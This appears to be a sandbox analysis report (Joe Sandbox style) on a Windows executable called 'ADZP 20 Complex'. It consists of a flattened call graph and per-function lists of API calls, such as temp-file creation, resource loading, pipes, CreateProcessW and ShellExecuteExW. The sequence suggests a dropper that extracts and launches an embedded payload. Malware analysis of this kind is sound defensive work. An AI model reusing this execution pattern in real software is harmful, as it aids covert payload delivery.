8727 4051a0 3 API calls 8726->8727 8728 402bb9 8727->8728 8729 405060 2 API calls 8728->8729 8730 402bc5 8729->8730 8731 40a220 RtlAllocateHeap 8730->8731 8732 402bcf GetShortPathNameW 8731->8732 9587 40e520 GetLastError TlsGetValue 
SetLastError 8732->9587 8734 402beb 9588 40e520 GetLastError TlsGetValue SetLastError 8734->9588 8736 402bf3 8737 40a290 5 API calls 8736->8737 8738 402c03 8737->8738 8739 40e560 3 API calls 8738->8739 8740 402c0d 8739->8740 9589 40a200 HeapFree 8740->9589 8742 402c16 9590 40e520 GetLastError TlsGetValue SetLastError 8742->9590 8744 402c20 8745 40e6c0 4 API calls 8744->8745 8746 402c28 8745->8746 9591 405170 TlsGetValue 8746->9591 8748 402c2f 8749 40e5f0 RtlFreeHeap 8748->8749 8750 402c46 8749->8750 8751 40e5f0 RtlFreeHeap 8750->8751 8752 402c4f 8751->8752 8753 40e720 TlsGetValue 8752->8753 8753->7834 8754->7836 8756 404594 8755->8756 8757 4099ac SetEnvironmentVariableW 8755->8757 8756->7839 8757->8756 8759->7842 8761 403807 8760->8761 8761->8761 8762 40e660 21 API calls 8761->8762 8781 403819 8762->8781 8763 40389a 9592 40e520 GetLastError TlsGetValue SetLastError 8763->9592 8765 4038a0 9593 40e520 GetLastError TlsGetValue SetLastError 8765->9593 8767 4038a8 9594 40e520 GetLastError TlsGetValue SetLastError 8767->9594 8768 405dc0 3 API calls 8768->8781 8770 4038b0 9595 40e520 GetLastError TlsGetValue SetLastError 8770->9595 8771 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8771->8781 8773 4038b8 8775 40d780 8 API calls 8773->8775 8774 40e520 GetLastError TlsGetValue SetLastError 8774->8781 8776 4038ca 8775->8776 9596 405182 TlsGetValue 8776->9596 8777 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 8777->8781 8779 4038cf 8780 405eb0 6 API calls 8779->8780 8782 4038d7 8780->8782 8781->8763 8781->8768 8781->8771 8781->8774 8781->8777 8783 40e560 3 API calls 8782->8783 8784 4038e1 8783->8784 9597 40e520 GetLastError TlsGetValue SetLastError 8784->9597 8786 4038e7 9598 40e520 GetLastError TlsGetValue SetLastError 8786->9598 8788 4038ef 9599 40e520 GetLastError TlsGetValue SetLastError 8788->9599 8790 4038f7 9600 40e520 GetLastError TlsGetValue SetLastError 8790->9600 8792 4038ff 8793 40d780 8 API calls 8792->8793 8794 403911 8793->8794 9601 405182 
TlsGetValue 8794->9601 8796 403916 8797 405eb0 6 API calls 8796->8797 8798 40391e 8797->8798 8799 40e560 3 API calls 8798->8799 8800 403928 8799->8800 9602 40e520 GetLastError TlsGetValue SetLastError 8800->9602 8802 40392e 9603 40e520 GetLastError TlsGetValue SetLastError 8802->9603 8804 403936 9604 40e520 GetLastError TlsGetValue SetLastError 8804->9604 8806 40393e 9605 40e520 GetLastError TlsGetValue SetLastError 8806->9605 8808 403946 8809 40d780 8 API calls 8808->8809 8810 403956 8809->8810 9606 405182 TlsGetValue 8810->9606 8812 40395b 8813 405eb0 6 API calls 8812->8813 8814 403963 8813->8814 8815 40e560 3 API calls 8814->8815 8816 40396d 8815->8816 9607 40e520 GetLastError TlsGetValue SetLastError 8816->9607 8818 403973 9608 40e520 GetLastError TlsGetValue SetLastError 8818->9608 8820 40397b 9609 40e520 GetLastError TlsGetValue SetLastError 8820->9609 8822 403983 9610 40e520 GetLastError TlsGetValue SetLastError 8822->9610 8824 40398b 8825 40d780 8 API calls 8824->8825 8826 40399b 8825->8826 9611 405182 TlsGetValue 8826->9611 8828 4039a0 8829 405eb0 6 API calls 8828->8829 8830 4039a8 8829->8830 8831 40e560 3 API calls 8830->8831 8832 4039b2 8831->8832 9612 40e520 GetLastError TlsGetValue SetLastError 8832->9612 8834 4039b8 9613 40e520 GetLastError TlsGetValue SetLastError 8834->9613 8836 4039c0 9614 40e520 GetLastError TlsGetValue SetLastError 8836->9614 8838 4039c8 9615 40e520 GetLastError TlsGetValue SetLastError 8838->9615 8840 4039d0 8841 40d780 8 API calls 8840->8841 8842 4039e0 8841->8842 9616 405182 TlsGetValue 8842->9616 8844 4039e5 8845 405eb0 6 API calls 8844->8845 8846 4039ed 8845->8846 8847 40e560 3 API calls 8846->8847 8848 4039f7 8847->8848 9617 40e520 GetLastError TlsGetValue SetLastError 8848->9617 8850 4039fd 9618 403e37 8850->9618 8853 4051a0 3 API calls 8854 403a12 8853->8854 9659 40e520 GetLastError TlsGetValue SetLastError 8854->9659 8856 403a18 8857 403e37 84 API calls 8856->8857 8858 403a28 8857->8858 8859 40e560 3 API calls 8858->8859 
8860 403a34 8859->8860 9660 40e520 GetLastError TlsGetValue SetLastError 8860->9660 8862 403a3a 8863 403e37 84 API calls 8862->8863 8864 403a4a 8863->8864 8865 40e560 3 API calls 8864->8865 8866 403a54 8865->8866 9661 40e520 GetLastError TlsGetValue SetLastError 8866->9661 8868 403a5a 8869 403e37 84 API calls 8868->8869 8870 403a6a 8869->8870 8871 40e560 3 API calls 8870->8871 8872 403a74 8871->8872 9662 40e520 GetLastError TlsGetValue SetLastError 8872->9662 8874 403a7a 8875 403e37 84 API calls 8874->8875 8876 403a8a 8875->8876 8877 40e560 3 API calls 8876->8877 8878 403a94 8877->8878 9663 40e520 GetLastError TlsGetValue SetLastError 8878->9663 8880 403a9a 9664 40e520 GetLastError TlsGetValue SetLastError 8880->9664 8882 403aa2 9665 40e520 GetLastError TlsGetValue SetLastError 8882->9665 8884 403aaa 8885 402ba6 43 API calls 8884->8885 8886 403ab7 8885->8886 9666 40e720 TlsGetValue 8886->9666 8888 403abc 9667 405182 TlsGetValue 8888->9667 8890 403acb 9668 406650 8890->9668 8893 40e560 3 API calls 8894 403ade 8893->8894 9671 40e520 GetLastError TlsGetValue SetLastError 8894->9671 8896 403ae4 9672 40e520 GetLastError TlsGetValue SetLastError 8896->9672 8898 403aec 9673 40e520 GetLastError TlsGetValue SetLastError 8898->9673 8900 403af4 8901 402ba6 43 API calls 8900->8901 8902 403b01 8901->8902 9674 40e720 TlsGetValue 8902->9674 8904 403b06 9675 405182 TlsGetValue 8904->9675 8906 403b15 8907 406650 13 API calls 8906->8907 8908 403b1e 8907->8908 8909 40e560 3 API calls 8908->8909 8910 403b28 8909->8910 9676 40e520 GetLastError TlsGetValue SetLastError 8910->9676 8912 403b2e 9677 40e520 GetLastError TlsGetValue SetLastError 8912->9677 8914 403b3a 8915 40e6c0 4 API calls 8914->8915 8916 403b42 8915->8916 8917 40e6c0 4 API calls 8916->8917 8918 403b4d 8917->8918 8919 40e6c0 4 API calls 8918->8919 8920 403b57 8919->8920 8921 40e6c0 4 API calls 8920->8921 8922 403b61 8921->8922 8923 40e6c0 4 API calls 8922->8923 8924 403b6b 8923->8924 9678 40e720 TlsGetValue 8924->9678 8926 
403b70 9679 405182 TlsGetValue 8926->9679 8928 403b7b 9680 4023b8 8928->9680 8931 4051a0 3 API calls 8932 403b89 8931->8932 8933 40e5f0 RtlFreeHeap 8932->8933 8934 403b94 8933->8934 8935 40e5f0 RtlFreeHeap 8934->8935 8936 403b9d 8935->8936 8937 40e5f0 RtlFreeHeap 8936->8937 8938 403ba6 8937->8938 8939 40e5f0 RtlFreeHeap 8938->8939 8940 403baf 8939->8940 8941 40e5f0 RtlFreeHeap 8940->8941 8942 403bb8 8941->8942 8943 40e5f0 RtlFreeHeap 8942->8943 8944 403bc1 8943->8944 8945 40e5f0 RtlFreeHeap 8944->8945 8946 403bca 8945->8946 8947 40e5f0 RtlFreeHeap 8946->8947 8948 403bd3 8947->8948 8949 40e5f0 RtlFreeHeap 8948->8949 8950 403bdc 8949->8950 8951 40e5f0 RtlFreeHeap 8950->8951 8952 403be5 8951->8952 8953 40e520 GetLastError TlsGetValue SetLastError 8952->8953 8953->7852 8955 40e660 21 API calls 8954->8955 8956 401e70 8955->8956 8957 4051a0 3 API calls 8956->8957 8958 401e79 8957->8958 9888 40e520 GetLastError TlsGetValue SetLastError 8958->9888 8960 401e7f 9889 40e520 GetLastError TlsGetValue SetLastError 8960->9889 8962 401e87 8963 409698 7 API calls 8962->8963 8964 401e8e 8963->8964 8965 40e560 3 API calls 8964->8965 8966 401e98 PathQuoteSpacesW 8965->8966 8967 401ef1 8966->8967 8968 401ea8 8966->8968 9956 40e520 GetLastError TlsGetValue SetLastError 8967->9956 9890 40e520 GetLastError TlsGetValue SetLastError 8968->9890 8971 401eae 9891 40249d 8971->9891 8972 401efa 8974 40e6c0 4 API calls 8972->8974 8976 401f02 8974->8976 8978 40e560 3 API calls 8976->8978 8977 40e560 3 API calls 8997 401eef 8978->8997 8983 401f16 8985 40e6c0 4 API calls 8983->8985 8987 401f1e 8985->8987 9958 405170 TlsGetValue 8987->9958 8992 401f25 8993 40e5f0 RtlFreeHeap 8992->8993 8996 401f3c 8993->8996 8998 40e5f0 RtlFreeHeap 8996->8998 9957 40e520 GetLastError TlsGetValue SetLastError 8997->9957 8999 401f45 8998->8999 8999->7855 9001 40e660 21 API calls 9000->9001 9002 403c91 9001->9002 9003 405060 2 API calls 9002->9003 9004 403c9d 9003->9004 9005 405060 2 API calls 9004->9005 9006 403caa 
9005->9006 9007 405060 2 API calls 9006->9007 9008 403cb7 9007->9008 9009 405060 2 API calls 9008->9009 9010 403cc4 9009->9010 9989 40e520 GetLastError TlsGetValue SetLastError 9010->9989 9012 403cd0 9013 40e6c0 4 API calls 9012->9013 9014 403cd8 9013->9014 9015 40e560 3 API calls 9014->9015 9016 403ce2 PathQuoteSpacesW 9015->9016 9990 40e520 GetLastError TlsGetValue SetLastError 9016->9990 9018 403cf5 9019 40e6c0 4 API calls 9018->9019 9020 403cfd 9019->9020 9085 4054b1 EnterCriticalSection 9084->9085 9086 404601 9084->9086 9087 4054c7 9085->9087 9093 4054f7 9085->9093 9086->7862 9089 4054c8 WaitForSingleObject 9087->9089 9087->9093 9088 40e1f2 HeapAlloc 9091 405511 LeaveCriticalSection 9088->9091 9089->9087 9090 4054d8 CloseHandle 9089->9090 9092 40e1b2 HeapFree 9090->9092 9091->9086 9092->9087 9093->9088 9095 40e660 21 API calls 9094->9095 9096 402c63 9095->9096 9097 405060 2 API calls 9096->9097 9098 402c6f 9097->9098 9099 402c9c 9098->9099 10091 40e520 GetLastError TlsGetValue SetLastError 9098->10091 10093 40e520 GetLastError TlsGetValue SetLastError 9099->10093 9102 402ca2 10094 40e520 GetLastError TlsGetValue SetLastError 9102->10094 9103 402c7e 10092 40e520 GetLastError TlsGetValue SetLastError 9103->10092 9106 402caa 10095 40e520 GetLastError TlsGetValue SetLastError 9106->10095 9107 402c86 9109 40a240 4 API calls 9107->9109 9111 402c92 9109->9111 9110 402cb2 10096 40e520 GetLastError TlsGetValue SetLastError 9110->10096 9112 40e560 3 API calls 9111->9112 9112->9099 9114 402cba 9115 40d780 8 API calls 9114->9115 9116 402cca 9115->9116 10097 405182 TlsGetValue 9116->10097 9118 402ccf 9119 405eb0 6 API calls 9118->9119 9120 402cd7 9119->9120 9121 40e560 3 API calls 9120->9121 9122 402ce1 FindResourceW 9121->9122 9123 402d04 9122->9123 9128 402db0 9122->9128 9124 402664 26 API calls 9123->9124 9125 402d13 9124->9125 9127 402dd8 9128->9127 9129 402dc8 9128->9129 9130 402ddf 9128->9130 9224 40e780 9174->9224 9176 40324e 9176->8277 9178 402b73 9177->9178 
9178->9178 9179 40e660 21 API calls 9178->9179 9180 402b85 GetNativeSystemInfo 9179->9180 9181 402b98 9180->9181 9181->8281 9181->8282 9183 4055a1 9182->9183 9187 403269 9182->9187 9183->9187 9227 40552c memset GetModuleHandleW 9183->9227 9186 4055df GetVersionExW 9186->9187 9187->8282 9188->8290 9189->8294 9191 40e900 3 API calls 9190->9191 9192 40329b 9191->9192 9192->8299 9193->8304 9194->8319 9195->8335 9230 40db18 EnterCriticalSection 9196->9230 9198 40b455 9199 40b4ee 9198->9199 9200 40b45f CreateFileW 9198->9200 9199->8346 9201 40b480 9200->9201 9203 40b4a0 9200->9203 9201->9203 9204 40b48d HeapAlloc 9201->9204 9205 40b4e5 9203->9205 9240 40da8a EnterCriticalSection 9203->9240 9204->9203 9205->8346 9207 40b069 9206->9207 9208 40b05a 9206->9208 9251 40dad9 EnterCriticalSection 9207->9251 9255 40e075 9208->9255 9213 40b0ad 9213->8347 9214 40b099 FindCloseChangeNotification 9216 40da8a 4 API calls 9214->9216 9216->9213 9217 40b088 HeapFree 9217->9214 9218->8355 9219->8357 9220->8289 9221->8293 9222->8306 9223->8314 9225 40e7c7 9224->9225 9226 40e78a wcslen RtlAllocateHeap 9224->9226 9225->9176 9226->9225 9228 405554 GetProcAddress 9227->9228 9229 405564 9227->9229 9228->9229 9229->9186 9229->9187 9231 40db32 9230->9231 9232 40db47 9230->9232 9235 40e1f2 HeapAlloc 9231->9235 9233 40db6c 9232->9233 9234 40db4c HeapReAlloc 9232->9234 9237 40db81 HeapAlloc 9233->9237 9238 40db75 9233->9238 9234->9233 9236 40db41 9235->9236 9239 40db9d LeaveCriticalSection 9236->9239 9237->9238 9238->9239 9239->9198 9241 40dac1 9240->9241 9242 40daa2 9240->9242 9248 40e1b2 9241->9248 9242->9241 9243 40daa7 9242->9243 9245 40dab0 memset 9243->9245 9246 40dacd LeaveCriticalSection 9243->9246 9245->9246 9246->9205 9247 40dacb 9247->9246 9249 40e1c3 HeapFree 9248->9249 9249->9247 9252 40daf2 9251->9252 9253 40dafd LeaveCriticalSection 9251->9253 9252->9253 9254 40b076 9253->9254 9254->9213 9254->9214 9261 40b0c0 9254->9261 9256 40e082 9255->9256 9257 40b065 9255->9257 9264 40e19b 
EnterCriticalSection 9256->9264 9257->8347 9260 40e088 9260->9257 9265 40e144 9260->9265 9262 40b0d4 WriteFile 9261->9262 9263 40b0fc 9261->9263 9262->9217 9263->9217 9264->9260 9267 40e150 9265->9267 9266 40e194 9266->9260 9267->9266 9268 40e18a LeaveCriticalSection 9267->9268 9268->9266 9270 40e660 21 API calls 9269->9270 9271 40266d LoadResource SizeofResource 9270->9271 9272 40a220 RtlAllocateHeap 9271->9272 9273 40269a 9272->9273 9286 40a300 memcpy 9273->9286 9275 4026b1 FreeResource 9276 4026c1 9275->9276 9277 40477d 9276->9277 9287 40a1e0 9277->9287 9279 404786 9279->8378 9281 40a228 RtlAllocateHeap 9280->9281 9282 40a23a 9280->9282 9281->8382 9282->8382 9290 40ee80 9283->9290 9285 402ed0 9285->8386 9286->9275 9288 40a1e8 HeapSize 9287->9288 9289 40a1fa 9287->9289 9288->9279 9289->9279 9291 40ee98 __fprintf_l 9290->9291 9293 40ef4a __fprintf_l 9291->9293 9294 40eff0 9291->9294 9293->9285 9295 40fa52 9294->9295 9299 40f000 __fprintf_l 9294->9299 9295->9291 9296 40f5d7 9300 40f644 __fprintf_l 9296->9300 9301 410b90 9296->9301 9298 40f4ef memcpy 9298->9299 9299->9295 9299->9296 9299->9298 9300->9291 9302 410ba4 9301->9302 9303 410c12 memcpy 9302->9303 9304 410bec memcpy 9302->9304 9306 410bbf 9302->9306 9307 410c39 memcpy 9303->9307 9308 410c58 9303->9308 9304->9300 9306->9300 9307->9300 9308->9300 9309->8396 9310->8400 9311->8404 9312->8407 9314 40a2a9 9313->9314 9315 40a299 9313->9315 9317 40e900 3 API calls 9314->9317 9417 40a240 9315->9417 9320 40a2bf 9317->9320 9318 40a2a6 9318->8412 9423 40ea90 TlsGetValue 9320->9423 9321 40a2e8 9321->8412 9322->8416 9424 405f90 9323->9424 9325 4021bd 9325->8421 9326->8425 9327->8427 9328->8429 9329->8431 9330->8435 9331->8441 9332->8443 9333->8445 9334->8447 9336 40590f 9335->9336 9343 405801 9335->9343 9434 40e9e0 TlsGetValue 9336->9434 9338 405918 9338->8449 9339 405886 9341 40e880 TlsGetValue 9339->9341 9340 405850 wcsncmp 9340->9343 9342 4058c7 9341->9342 9344 4058e9 9342->9344 9433 40e8d0 TlsGetValue 9342->9433 
9343->9339 9343->9340 9346 40e900 3 API calls 9344->9346 9348 4058f0 9346->9348 9347 4058d7 memmove 9347->9344 9349 405901 9348->9349 9350 4058f6 wcsncpy 9348->9350 9349->8449 9350->9349 9351->8451 9352->8453 9353->8455 9354->8459 9355->8461 9435 408e58 9356->9435 9358 408f81 9359 408e58 3 API calls 9358->9359 9360 408f90 9359->9360 9361 408e58 3 API calls 9360->9361 9362 408fa3 9361->9362 9363 408fb0 GetStockObject 9362->9363 9364 408fbd LoadIconW LoadCursorW RegisterClassExW 9362->9364 9363->9364 9439 4094d1 GetForegroundWindow 9364->9439 9369 409047 IsWindowEnabled 9370 40906b 9369->9370 9371 409052 EnableWindow 9369->9371 9372 4094d1 3 API calls 9370->9372 9371->9370 9373 40907e GetSystemMetrics GetSystemMetrics CreateWindowExW 9372->9373 9374 4092ba 9373->9374 9375 4090cb SetWindowLongW CreateWindowExW SendMessageW 9373->9375 9376 4092cd 9374->9376 9453 40e9e0 TlsGetValue 9374->9453 9377 409125 9375->9377 9378 409128 CreateWindowExW SendMessageW SetFocus 9375->9378 9454 408e9a 9376->9454 9377->9378 9380 4091a5 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 9378->9380 9381 40917b SendMessageW wcslen wcslen SendMessageW 9378->9381 9384 40926a 9380->9384 9381->9380 9386 409273 9384->9386 9387 40922e GetMessageW 9384->9387 9385 408e9a HeapFree 9388 4092df 9385->9388 9390 409277 DestroyAcceleratorTable 9386->9390 9391 40927e 9386->9391 9387->9386 9389 409243 TranslateAcceleratorW 9387->9389 9392 408e9a HeapFree 9388->9392 9389->9384 9393 409254 TranslateMessage DispatchMessageW 9389->9393 9390->9391 9391->9374 9394 409285 wcslen 9391->9394 9395 4092e5 9392->9395 9393->9384 9396 40e900 3 API calls 9394->9396 9395->8463 9397 40929c wcscpy HeapFree 9396->9397 9397->9374 9398->8470 9399->8472 9400->8474 9401->8476 9402->8480 9403->8487 9404->8489 9405->8491 9406->8495 9407->8497 9409 4094d1 3 API calls 9408->9409 9410 408e2d 9409->9410 9411 409588 16 API calls 9410->9411 9412 408e36 MessageBoxW 9411->9412 9413 409588 16 API 
calls 9412->9413 9414 40234b 9413->9414 9414->8500 9415->8397 9416->8405 9418 40a24d 9417->9418 9419 40e900 3 API calls 9418->9419 9420 40a26b 9419->9420 9421 40a271 memcpy 9420->9421 9422 40a27f 9420->9422 9421->9422 9422->9318 9423->9321 9426 405fa1 9424->9426 9425 40e880 TlsGetValue 9427 406014 9425->9427 9426->9425 9426->9426 9428 40e900 3 API calls 9427->9428 9429 406022 9428->9429 9431 406032 9429->9431 9432 40ea10 TlsGetValue 9429->9432 9431->9325 9432->9431 9433->9347 9434->9338 9436 408e60 wcslen HeapAlloc 9435->9436 9437 408e96 9435->9437 9436->9437 9438 408e86 wcscpy 9436->9438 9437->9358 9438->9358 9440 409032 9439->9440 9441 4094e2 GetWindowThreadProcessId GetCurrentProcessId 9439->9441 9442 409588 9440->9442 9441->9440 9443 409592 EnumWindows 9442->9443 9451 4095dd 9442->9451 9444 4095af 9443->9444 9449 40903e 9443->9449 9457 409507 GetWindowThreadProcessId GetCurrentThreadId 9443->9457 9446 4095b1 GetCurrentThreadId 9444->9446 9447 4095c4 SetWindowPos 9444->9447 9444->9449 9445 4095ea GetCurrentThreadId 9445->9451 9446->9444 9447->9444 9448 409600 EnableWindow 9448->9451 9449->9369 9449->9370 9450 409611 SetWindowPos 9450->9451 9451->9445 9451->9448 9451->9449 9451->9450 9452 40e1b2 HeapFree 9451->9452 9452->9451 9453->9376 9455 408ea1 HeapFree 9454->9455 9456 408eb3 9454->9456 9455->9456 9456->9385 9458 409525 IsWindowVisible 9457->9458 9459 40957f 9457->9459 9458->9459 9460 409530 9458->9460 9461 40e1f2 HeapAlloc 9460->9461 9462 40953c GetCurrentThreadId GetWindowLongW 9461->9462 9463 40955a 9462->9463 9464 40955e GetForegroundWindow 9462->9464 9463->9464 9464->9459 9465 409568 IsWindowEnabled 9464->9465 9465->9459 9466 409573 EnableWindow 9465->9466 9466->9459 9467->8509 9468->8512 9470 40e900 3 API calls 9469->9470 9471 40ade9 GetTempPathW LoadLibraryW 9470->9471 9472 40ae24 9471->9472 9473 40ae06 GetProcAddress 9471->9473 9495 40ea90 TlsGetValue 9472->9495 9474 40ae16 GetLongPathNameW 9473->9474 9475 40ae1d FreeLibrary 9473->9475 9474->9475 

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                      • Part of subcall function 0040E900: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E967
                    • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040ADED
                    • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040ADFA
                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040AE0C
                    • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040AE19
                    • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040AE1E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTempValue
                    • String ID: GetLongPathNameW$Kernel32.DLL
                    • API String ID: 1993255246-2943376620
                    • Opcode ID: b269ce3a440ba4175cabcfb75d30ea3c0961c0f40c5e72e3f128e2335a594a21
                    • Instruction ID: e37525813661028bcc8eb249af8eccfe35d88e27d7fdedfae3674fb0e28627f1
                    • Opcode Fuzzy Hash: b269ce3a440ba4175cabcfb75d30ea3c0961c0f40c5e72e3f128e2335a594a21
                    • Instruction Fuzzy Hash: FAF082722452547FC3216BB6AC8CEEB3EACDF86755300443AF905E2251EA7C5D2086BD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 00409A69
                    • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409AF1
                    • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B46
                    • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B8C
                    • GetStdHandle.KERNEL32(000000F6), ref: 00409BD6
                    • GetStdHandle.KERNEL32(000000F5), ref: 00409BEA
                    • GetStdHandle.KERNEL32(000000F4), ref: 00409BFE
                    • wcslen.MSVCRT ref: 00409C2A
                    • wcslen.MSVCRT ref: 00409C38
                    • HeapAlloc.KERNEL32(00000000,00000000), ref: 00409C52
                    • wcscpy.MSVCRT ref: 00409C6A
                    • wcscat.MSVCRT ref: 00409C71
                    • wcscat.MSVCRT ref: 00409C7C
                    • wcscpy.MSVCRT ref: 00409C88
                    • wcscat.MSVCRT ref: 00409CA3
                    • wcscat.MSVCRT ref: 00409CB0
                    • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,?,?,?), ref: 00409CEA
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D08
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D14
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D20
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D26
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 00409D3A
                    • EnterCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D4C
                    • LeaveCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D63
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D97
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DAE
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DBA
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DC6
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DD2
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DDE
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DEA
                    • wcslen.MSVCRT ref: 00409E04
                    • wcscpy.MSVCRT ref: 00409E2A
                    • memset.MSVCRT ref: 00409E56
                    • ShellExecuteExW.SHELL32 ref: 00409EB3
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00409ED2
                    • EnterCriticalSection.KERNEL32(00418730), ref: 00409EE4
                    • LeaveCriticalSection.KERNEL32(00418730), ref: 00409EFB
                      • Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409BAF,?), ref: 004099D6
                      • Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,?,?,00409BAF,?), ref: 004099E2
                      • Part of subcall function 004099C7: DuplicateHandle.KERNEL32(00000000,?,?,00409BAF,?), ref: 004099E9
                      • Part of subcall function 004099C7: CloseHandle.KERNEL32(?,?,?,00409BAF,?), ref: 004099F5
                    • HeapFree.KERNEL32(00000000,?), ref: 00409F37
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Handle$Close$CreateCriticalSectionwcscat$PipeProcesswcscpywcslen$CurrentEnterHeapLeaveObjectSingleWaitmemset$AllocDuplicateExecuteFreeShell
                    • String ID: $0A$x
                    • API String ID: 550696126-3693508903
                    • Opcode ID: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
                    • Instruction ID: 1938edec6f8ec7f018cd84e447521b205a2f1ffc1a01eed9409a43f0bd8935e3
                    • Opcode Fuzzy Hash: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
                    • Instruction Fuzzy Hash: 8AE15B71908341AFD321DF24D841B9BBBE4FF84350F148A3FF499A2291DB799944CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                    • GetTempFileNameW.KERNEL32(?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404519), ref: 00401A3B
                    • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A90
                    • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AE5
                    • PathAddBackslashW.SHLWAPI(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AF0
                    • PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000), ref: 00401B2F
                    • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024), ref: 00401B49
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E5BC
                    Strings
                    Memory Dump Source
